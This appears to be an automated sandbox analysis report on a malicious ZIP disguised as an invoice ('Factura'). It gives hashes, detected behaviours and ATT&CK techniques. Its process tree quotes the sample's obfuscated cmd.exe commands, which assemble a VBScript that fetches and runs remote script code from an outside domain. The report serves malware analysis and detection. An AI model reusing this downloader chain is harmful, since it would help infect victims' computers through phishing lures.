8c5a75bd899e61301849837c606731fc8aa7fd45d6370d4d7b9d633564e787e7

Resubmissions

22/05/2024, 23:11

240522-26kjnscf4x 7

22/05/2024, 22:43

240522-2npqnsbh33 7

Analysis

max time kernel
334s
max time network
329s
platform
windows10-2004_x64
resource
win10v2004-20240508-en
resource tags

arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
submitted
22/05/2024, 23:11

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

❉𝔽𝕒𝕔𝕥𝕦𝕣𝕒❉_①⑤①②①⑤⑥⑨⑥①.zip
Size

1.2MB
MD5

08ed23fe70e6b3d6000d5569d6b27022
SHA1

8ae5a5dd8626b9a31d661335e1b29ca4a6d2104c
SHA256

8c5a75bd899e61301849837c606731fc8aa7fd45d6370d4d7b9d633564e787e7
SHA512

77d12ce95a62c485908aaaffc43d39a195054c9a579e87d25c56ce829391f55c1e2e43bf62f924357ba90f3fee5897ebfb8b1f540e5c3e12bfb5d24f8a9bc552
SSDEEP

24576:F6zDiVkgEq9zRhop3FN8LLP3I1sO7+I1FCD9ih4tp6/o4DtceqKlhd8FWVw:F6XiCgEq9zRhoJALfI1sO725u4z6tDxM

Score

7^/10

Malware Config

Signatures

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\Control Panel\International\Geo\Nation	mshta.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Opens file in notepad (likely ransom note) 1 IoCs

ransomware

pid	Process
3604	Notepad.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

description	pid	Process
Token: SeRestorePrivilege	1476	7zG.exe
Token: 35	1476	7zG.exe
Token: SeSecurityPrivilege	1476	7zG.exe
Token: SeSecurityPrivilege	1476	7zG.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
1476	7zG.exe

Suspicious use of WriteProcessMemory 18 IoCs

description	pid	Process	procid_target
PID 4000 wrote to memory of 4808	4000	mshta.exe	108
PID 4000 wrote to memory of 4808	4000	mshta.exe	108
PID 4000 wrote to memory of 4808	4000	mshta.exe	108
PID 4000 wrote to memory of 4964	4000	mshta.exe	110
PID 4000 wrote to memory of 4964	4000	mshta.exe	110
PID 4000 wrote to memory of 4964	4000	mshta.exe	110
PID 4964 wrote to memory of 5044	4964	cmd.exe	112
PID 4964 wrote to memory of 5044	4964	cmd.exe	112
PID 4964 wrote to memory of 5044	4964	cmd.exe	112
PID 4964 wrote to memory of 1112	4964	cmd.exe	113
PID 4964 wrote to memory of 1112	4964	cmd.exe	113
PID 4964 wrote to memory of 1112	4964	cmd.exe	113
PID 4964 wrote to memory of 1524	4964	cmd.exe	114
PID 4964 wrote to memory of 1524	4964	cmd.exe	114
PID 4964 wrote to memory of 1524	4964	cmd.exe	114
PID 4964 wrote to memory of 1576	4964	cmd.exe	115
PID 4964 wrote to memory of 1576	4964	cmd.exe	115
PID 4964 wrote to memory of 1576	4964	cmd.exe	115

C:\Windows\Explorer.exe
C:\Windows\Explorer.exe /idlist,,C:\Users\Admin\AppData\Local\Temp\❉𝔽𝕒𝕔𝕥𝕦𝕣𝕒❉_①⑤①②①⑤⑥⑨⑥①.zip
1⤵
PID:4600

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:1352

C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Desktop\❉𝔽𝕒𝕔𝕥𝕦𝕣𝕒❉_①⑤①②①⑤⑥⑨⑥①\" -spe -an -ai#7zMap31868:112:7zEvent1645
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:1476

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\Desktop\❉𝔽𝕒𝕔𝕥𝕦𝕣𝕒❉_①⑤①②①⑤⑥⑨⑥①\❉𝔽𝕒𝕔𝕥𝕦𝕣𝕒❉_⑦⑦③⑥⑧①.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4000
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /V/D/c "echo H6Fl75="ri">C:\Users\Public\GMHP50.vbs&&echo YG1dm37="tp">>C:\Users\Public\GMHP50.vbs&&echo QHlz58=".":OUeyQzy31="sC" ^& H6Fl75 ^& "pt:ht" ^& YG1dm37 ^& "s://">>C:\Users\Public\GMHP50.vbs"
  2⤵
  PID:4808
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /V/D/c echo|set /p=^"OUeyQzy31^=OUeyQzy31 ^& ^"mbx1"+QHlz58+"sacxmodulo"+QHlz58+"com/g2^":GetO^">>C:\Users\Public\\GMHP50.vbs&echo|set /p=^"bject(^">>C:\Users\Public\\GMHP50.vbs
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4964
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo"
    3⤵
    PID:5044
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" set /p="OUeyQzy31=OUeyQzy31 & "mbx1"+QHlz58+"sacxmodulo"+QHlz58+"com/g2":GetO" 1>>C:\Users\Public\\GMHP50.vbs"
    3⤵
    PID:1112
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo"
    3⤵
    PID:1524
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" set /p="bject(" 1>>C:\Users\Public\\GMHP50.vbs"
    3⤵
    PID:1576

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Public\GMHP50.vbs"
1⤵
PID:3080

C:\Windows\System32\Notepad.exe
"C:\Windows\System32\Notepad.exe" C:\Users\Public\GMHP50.vbs
1⤵
- Opens file in notepad (likely ransom note)
PID:3604

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\Desktop\❉𝔽𝕒𝕔𝕥𝕦𝕣𝕒❉_①⑤①②①⑤⑥⑨⑥①\❉𝔽𝕒𝕔𝕥𝕦𝕣𝕒❉_⑦⑦③⑥⑧①.hta

Filesize
1KB

MD5
533f0f1d3c088205aa800bf5e5630b08

SHA1
697214f2cc24af8d1ada6bc5824d97be5c6f386a

SHA256
343d9e4ac6db94053b6366cd6c7afce22083a47424a71729a9c5f7f824a2e212

SHA512
d9ddc677969e095cce027e0adc5ed9ab51a3d9457d6cf80f2d78e0c55971c095afd094c854c7f35f244e03a44edbf9c4fe88b7b932dc2209e5e358bb407162e6

Download Submit
C:\Users\Public\GMHP50.vbs

Filesize
167B

MD5
a699d09334dc888472b55886e89ceac8

SHA1
f76baf94c19a0c8a4a5cf4d922b42743bb60aee4

SHA256
797dfb900a8b7cedb145f88b7334e5a4738647dfa92a5b7bd59998efd0e98b49

SHA512
6659d283dbfa58a85ff2e2c8a2750a00ec4cea410de6e96a6cdbbd4579af9ed3d8ac7f9d2e709275533000666d8480c6427a239fb965c13043e62dd98cc2e111

Download Submit
C:\Users\Public\GMHP50.vbs

Filesize
161B

MD5
c63dfeb9bca593e0a4ea786241c31fce

SHA1
a959681cf726c7cd8ba4269521ffea439ceea7e0

SHA256
7975d776c3274651c582aadebce3d46082b053e5b8b85a63791225281466ce4f

SHA512
342109f781a6b02a8447eb529e43f776a29dc0cb2ebf34c281dd78ed56eb7c39f5ce15ff12ce639881fa6a9eed4ca0498447e82adde970082a82f5003837a745

Download Submit